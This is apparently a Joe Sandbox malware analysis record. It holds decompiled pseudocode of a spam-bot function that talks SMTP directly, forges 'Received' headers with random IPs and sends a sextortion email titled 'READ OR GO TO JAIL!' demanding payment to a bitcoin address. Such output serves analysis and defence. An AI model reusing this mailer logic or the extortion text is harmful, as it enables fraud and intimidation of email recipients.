                                                                                                                                                                                                                                                                  0x00901e75
                                                                                                                                                                                                                                                                  0x00901e7b
                                                                                                                                                                                                                                                                  0x00901e7e
                                                                                                                                                                                                                                                                  0x00901e84
                                                                                                                                                                                                                                                                  0x00901e8b
                                                                                                                                                                                                                                                                  0x00901ea0
                                                                                                                                                                                                                                                                  0x00901eb8
                                                                                                                                                                                                                                                                  0x00901ebf
                                                                                                                                                                                                                                                                  0x00901ec5
                                                                                                                                                                                                                                                                  0x00901ec8
                                                                                                                                                                                                                                                                  0x00901ece
                                                                                                                                                                                                                                                                  0x00901edc
                                                                                                                                                                                                                                                                  0x00901eea
                                                                                                                                                                                                                                                                  0x00901ef8
                                                                                                                                                                                                                                                                  0x00901f0b
                                                                                                                                                                                                                                                                  0x00901f11
                                                                                                                                                                                                                                                                  0x00901f14
                                                                                                                                                                                                                                                                  0x00901f1a
                                                                                                                                                                                                                                                                  0x00901f21
                                                                                                                                                                                                                                                                  0x00901f36
                                                                                                                                                                                                                                                                  0x00901f44
                                                                                                                                                                                                                                                                  0x00901f4b
                                                                                                                                                                                                                                                                  0x00901f66
                                                                                                                                                                                                                                                                  0x00901f74
                                                                                                                                                                                                                                                                  0x00901f7b
                                                                                                                                                                                                                                                                  0x00901f81
                                                                                                                                                                                                                                                                  0x00901f84
                                                                                                                                                                                                                                                                  0x00901f8a
                                                                                                                                                                                                                                                                  0x00901f98
                                                                                                                                                                                                                                                                  0x00901fa6
                                                                                                                                                                                                                                                                  0x00901fbb
                                                                                                                                                                                                                                                                  0x00901fc9
                                                                                                                                                                                                                                                                  0x00901fec
                                                                                                                                                                                                                                                                  0x00902008
                                                                                                                                                                                                                                                                  0x00902015
                                                                                                                                                                                                                                                                  0x00902030
                                                                                                                                                                                                                                                                  0x00902044
                                                                                                                                                                                                                                                                  0x00902051
                                                                                                                                                                                                                                                                  0x00902080
                                                                                                                                                                                                                                                                  0x0090208d
                                                                                                                                                                                                                                                                  0x009020bc
                                                                                                                                                                                                                                                                  0x009020c9
                                                                                                                                                                                                                                                                  0x009020f8
                                                                                                                                                                                                                                                                  0x00902105
                                                                                                                                                                                                                                                                  0x0090211d
                                                                                                                                                                                                                                                                  0x0090212b
                                                                                                                                                                                                                                                                  0x00902136
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0090213f
                                                                                                                                                                                                                                                                  0x00902146
                                                                                                                                                                                                                                                                  0x0090214a
                                                                                                                                                                                                                                                                  0x00902152
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00901ac9
                                                                                                                                                                                                                                                                  0x0090215e
                                                                                                                                                                                                                                                                  0x00902167
                                                                                                                                                                                                                                                                  0x00902170
                                                                                                                                                                                                                                                                  0x0090217a
                                                                                                                                                                                                                                                                  0x00902186
                                                                                                                                                                                                                                                                  0x00902186

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00901C37
                                                                                                                                                                                                                                                                    • Part of subcall function 00901120: lstrlenA.KERNEL32(?), ref: 0090112D
                                                                                                                                                                                                                                                                    • Part of subcall function 00901120: send.WS2_32(?,?,000000FF,00000000), ref: 00901144
                                                                                                                                                                                                                                                                  • shutdown.WS2_32(000000FF,00000002), ref: 00902170
                                                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 0090217A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: closesocketlstrlensendshutdownwsprintf
                                                                                                                                                                                                                                                                  • String ID: RCPT TO: <%s>
                                                                                                                                                                                                                                                                  • API String ID: 1492768164-1854338671
                                                                                                                                                                                                                                                                  • Opcode ID: d844f45a75ac08ef7dad158e43ac102adff28c01baead9b6427d01a257705daf
                                                                                                                                                                                                                                                                  • Instruction ID: e7ff87f848a3376dae2d2ee6cb041ecfb7ff4cdd8e1f9c7bdaeabca1ace103d8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d844f45a75ac08ef7dad158e43ac102adff28c01baead9b6427d01a257705daf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 551151B1D04228DFCF14CF94DC49BEEB7B8BB48304F008599E609B6280D7794A95CF55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 311 901c7c-901c91 call 901120 314 901c93-901c9a 311->314 315 901c9f-901ca6 311->315 316 902159 314->316 315->316 318 901a9a-901a9e 316->318 319 90215e-90217a shutdown closesocket 316->319 318->319 320 901aa4-901ab4 call 901160 318->320 323 902180-902186 319->323 324 901ab9-901ac9 320->324 325 901ad0-901aef call 9011c0 324->325 326 901acb 324->326 329 901af1 325->329 330 901af6-901b15 325->330 326->319 329->319 330->316 331 901b1b 330->331 331->316
                                                                                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                                                                                  			E00901C7C(void* __eflags) {
                                                                                                                                                                                                                                                                  				void* _t156;
                                                                                                                                                                                                                                                                  				intOrPtr _t160;
                                                                                                                                                                                                                                                                  				void* _t161;
                                                                                                                                                                                                                                                                  				void* _t182;
                                                                                                                                                                                                                                                                  				void* _t184;
                                                                                                                                                                                                                                                                  				void* _t185;
                                                                                                                                                                                                                                                                  				void* _t187;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					_t156 = E00901120( *((intOrPtr*)(_t182 - 0x1c)), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  					_t185 = _t184 + 0xc;
                                                                                                                                                                                                                                                                  					if(_t156 != 0) {
                                                                                                                                                                                                                                                                  						 *(_t182 - 0x20) = 6;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L46:
                                                                                                                                                                                                                                                                  					while( *(_t182 - 0x20) != 0 &&  *(_t182 - 0x20) != 8) {
                                                                                                                                                                                                                                                                  						_t160 = E00901160( *((intOrPtr*)(_t182 - 0x1c)), _t182 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                  						_t187 = _t185 + 0xc;
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t182 - 0x90)) = _t160;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t182 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                  							L5:
                                                                                                                                                                                                                                                                  							 *((char*)(_t182 +  *((intOrPtr*)(_t182 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                  							_t161 = E009011C0(_t182 - 0x490);
                                                                                                                                                                                                                                                                  							_t185 = _t187 + 4;
                                                                                                                                                                                                                                                                  							if(_t161 != 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *(_t182 - 0x718) =  *(_t182 - 0x20);
                                                                                                                                                                                                                                                                  								 *(_t182 - 0x718) =  *(_t182 - 0x718) - 1;
                                                                                                                                                                                                                                                                  								if( *(_t182 - 0x718) > 6) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								L8:
                                                                                                                                                                                                                                                                  								switch( *((intOrPtr*)( *(_t182 - 0x718) * 4 +  &M00902188))) {
                                                                                                                                                                                                                                                                  									case 0:
                                                                                                                                                                                                                                                                  										L9:
                                                                                                                                                                                                                                                                  										_push("ESMTP");
                                                                                                                                                                                                                                                                  										if(StrStrA(_t182 - 0x490) == 0) {
                                                                                                                                                                                                                                                                  											_t165 = wsprintfA(_t182 - 0x490, "HELO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t188 = _t185 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t182 - 0x494) = _t165;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											_t168 = wsprintfA(_t182 - 0x490, "EHLO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t188 = _t185 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t182 - 0x494) = _t168;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t167 = E00901120( *((intOrPtr*)(_t182 - 0x1c)), _t182 - 0x490,  *(_t182 - 0x494)); // executed
                                                                                                                                                                                                                                                                  										_t185 = _t188 + 0xc;
                                                                                                                                                                                                                                                                  										if(_t167 != 0) {
                                                                                                                                                                                                                                                                  											 *(_t182 - 0x20) = 3;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(_t182 - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 1:
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 2:
                                                                                                                                                                                                                                                                  										L16:
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x88;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x88, "<%s>",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "MAIL FROM: %s\r\n", __ebp - 0x88);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x498) = __eax;
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x498);
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x498)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 4;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 3:
                                                                                                                                                                                                                                                                  										L19:
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "RCPT TO: <%s>\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x49c) = __eax;
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x49c);
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x49c)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 5;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 4:
                                                                                                                                                                                                                                                                  										goto L0;
                                                                                                                                                                                                                                                                  									case 5:
                                                                                                                                                                                                                                                                  										L24:
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x61c;
                                                                                                                                                                                                                                                                  										E00901320(__ebp - 0x61c, 5, __ebp - 0x61c) = wsprintfA(__ebp - 0x508, "%s.com", __eax);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										__ebp - 0x710 = E00901490(0, __ebp - 0x710, 1); // executed
                                                                                                                                                                                                                                                                  										Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                  										__eax = E00901490(0, __ebp - 0x690, 0); // executed
                                                                                                                                                                                                                                                                  										__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t57 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t61 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t65 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xd2;
                                                                                                                                                                                                                                                                  										_t69 = __eax % 0xd2;
                                                                                                                                                                                                                                                                  										E00901390(0xd2, 7, __ebp - 0x6a8) = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", __ebp - 0x490, _t69 + 1, _t65 + 1, _t61 + 1, _t57 + 1, __ebp - 0x508, __ebp - 0x690);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0x24;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											__ecx = __ebp - 0x710;
                                                                                                                                                                                                                                                                  											E00901320(__ecx, 3, __ebp - 0x628) = __ebp - 0x69c;
                                                                                                                                                                                                                                                                  											__eax = E00901320(__ecx, 5, __ebp - 0x69c);
                                                                                                                                                                                                                                                                  											__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  											__eax = wsprintfA(__ebp - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", __eax, __eax, __ebp - 0x490);
                                                                                                                                                                                                                                                                  											__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  											__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  											__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  											__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                                                                                                                                  												__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  												__eax = wsprintfA(__ebp - 0x490, "From: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  												__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  												 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  												__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  												__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  												__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  												if(__eax != 0) {
                                                                                                                                                                                                                                                                  													__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  													__eax = wsprintfA(__ebp - 0x490, "To: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  													__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  													 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  													__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  													__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  													if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  														__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  														__eax = wsprintfA(__ebp - 0x490, "Subject: %s\r\n", "READ OR GO TO JAIL!");
                                                                                                                                                                                                                                                                  														__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  														 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  														__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  														__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  														if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  															__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                  															__eax = wsprintfA(__ebp - 0x490, "Date: %s\r\n", __ebp - 0x690);
                                                                                                                                                                                                                                                                  															__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  															 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  															__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  															__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  															if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  																__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                  																__ecx = __ebp - 0x628;
                                                                                                                                                                                                                                                                  																E00901320(__ecx, 6, __ecx) = E00901320(__ecx, 6, __ebp - 0x69c);
                                                                                                                                                                                                                                                                  																__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  																__eax = wsprintfA(__ebp - 0x490, "Message-ID: <%s.%s@%s>\r\n", __ebp - 0x490, __ebp - 0x490, __ebp - 0x508);
                                                                                                                                                                                                                                                                  																__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                  																 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  																__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  																__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  																	__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																	if(E00901120( *(__ebp - 0x1c), "Mime-Version: 1.0\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																		if(E00901120( *(__ebp - 0x1c), "Content-type: text/plain;\r\n\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = memset(__ebp - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			strcpy(__ebp - 0x610, "Hi, I keep the whole story short.\r\n\r\n") = strcat(__ebp - 0x610, "Your device got infected with my private trojan, it gave me access to all your files, accounts and contacts.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "Check the sender of this email, I sent it from your email account.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "It won\'t take a long time to send your data with the proof of your activities to the police.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "My address is: bc1qfzlmekudmjnhj88yjl8277zkzu6v9c2r890fan\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "Once I get the payment, I will remove everything, be sure, I keep my promises.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			strcat(__ebp - 0x610, "Next time keep your device updated with the newest security patches.\r\n.\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																			if(E00901120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																				 *(__ebp - 0x20) = 7;
                                                                                                                                                                                                                                                                  																			} else {
                                                                                                                                                                                                                                                                  																				 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																			}
                                                                                                                                                                                                                                                                  																		} else {
                                                                                                                                                                                                                                                                  																			 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																		}
                                                                                                                                                                                                                                                                  																	} else {
                                                                                                                                                                                                                                                                  																		 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																	}
                                                                                                                                                                                                                                                                  																} else {
                                                                                                                                                                                                                                                                  																	 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  															} else {
                                                                                                                                                                                                                                                                  																 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  															}
                                                                                                                                                                                                                                                                  														} else {
                                                                                                                                                                                                                                                                  															 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  													} else {
                                                                                                                                                                                                                                                                  														 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  												} else {
                                                                                                                                                                                                                                                                  													 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 6:
                                                                                                                                                                                                                                                                  										L45:
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x20) = 8;
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L47:
                                                                                                                                                                                                                                                                  					 *(_t182 - 8) = 0 |  *(_t182 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                  					__imp__#22( *((intOrPtr*)(_t182 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                  					__imp__#3( *((intOrPtr*)(_t182 - 0x1c)));
                                                                                                                                                                                                                                                                  					return  *(_t182 - 8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x00901c7c
                                                                                                                                                                                                                                                                  0x00901c7c
                                                                                                                                                                                                                                                                  0x00901c7c
                                                                                                                                                                                                                                                                  0x00901c87
                                                                                                                                                                                                                                                                  0x00901c8c
                                                                                                                                                                                                                                                                  0x00901c91
                                                                                                                                                                                                                                                                  0x00901c9f
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902159
                                                                                                                                                                                                                                                                  0x00901ab4
                                                                                                                                                                                                                                                                  0x00901ab9
                                                                                                                                                                                                                                                                  0x00901abc
                                                                                                                                                                                                                                                                  0x00901ac9
                                                                                                                                                                                                                                                                  0x00901ad0
                                                                                                                                                                                                                                                                  0x00901ad6
                                                                                                                                                                                                                                                                  0x00901ae5
                                                                                                                                                                                                                                                                  0x00901aea
                                                                                                                                                                                                                                                                  0x00901aef
                                                                                                                                                                                                                                                                  0x00901af6
                                                                                                                                                                                                                                                                  0x00901af9
                                                                                                                                                                                                                                                                  0x00901b08
                                                                                                                                                                                                                                                                  0x00901b15
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901b1b
                                                                                                                                                                                                                                                                  0x00901b21
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901b28
                                                                                                                                                                                                                                                                  0x00901b28
                                                                                                                                                                                                                                                                  0x00901b3c
                                                                                                                                                                                                                                                                  0x00901b71
                                                                                                                                                                                                                                                                  0x00901b77
                                                                                                                                                                                                                                                                  0x00901b7a
                                                                                                                                                                                                                                                                  0x00901b3e
                                                                                                                                                                                                                                                                  0x00901b4f
                                                                                                                                                                                                                                                                  0x00901b55
                                                                                                                                                                                                                                                                  0x00901b58
                                                                                                                                                                                                                                                                  0x00901b58
                                                                                                                                                                                                                                                                  0x00901b92
                                                                                                                                                                                                                                                                  0x00901b97
                                                                                                                                                                                                                                                                  0x00901b9c
                                                                                                                                                                                                                                                                  0x00901baa
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901bb6
                                                                                                                                                                                                                                                                  0x00901bb6
                                                                                                                                                                                                                                                                  0x00901bbf
                                                                                                                                                                                                                                                                  0x00901bc6
                                                                                                                                                                                                                                                                  0x00901bcc
                                                                                                                                                                                                                                                                  0x00901bdb
                                                                                                                                                                                                                                                                  0x00901be2
                                                                                                                                                                                                                                                                  0x00901be8
                                                                                                                                                                                                                                                                  0x00901beb
                                                                                                                                                                                                                                                                  0x00901bf1
                                                                                                                                                                                                                                                                  0x00901bff
                                                                                                                                                                                                                                                                  0x00901c03
                                                                                                                                                                                                                                                                  0x00901c0d
                                                                                                                                                                                                                                                                  0x00901c1b
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00000000
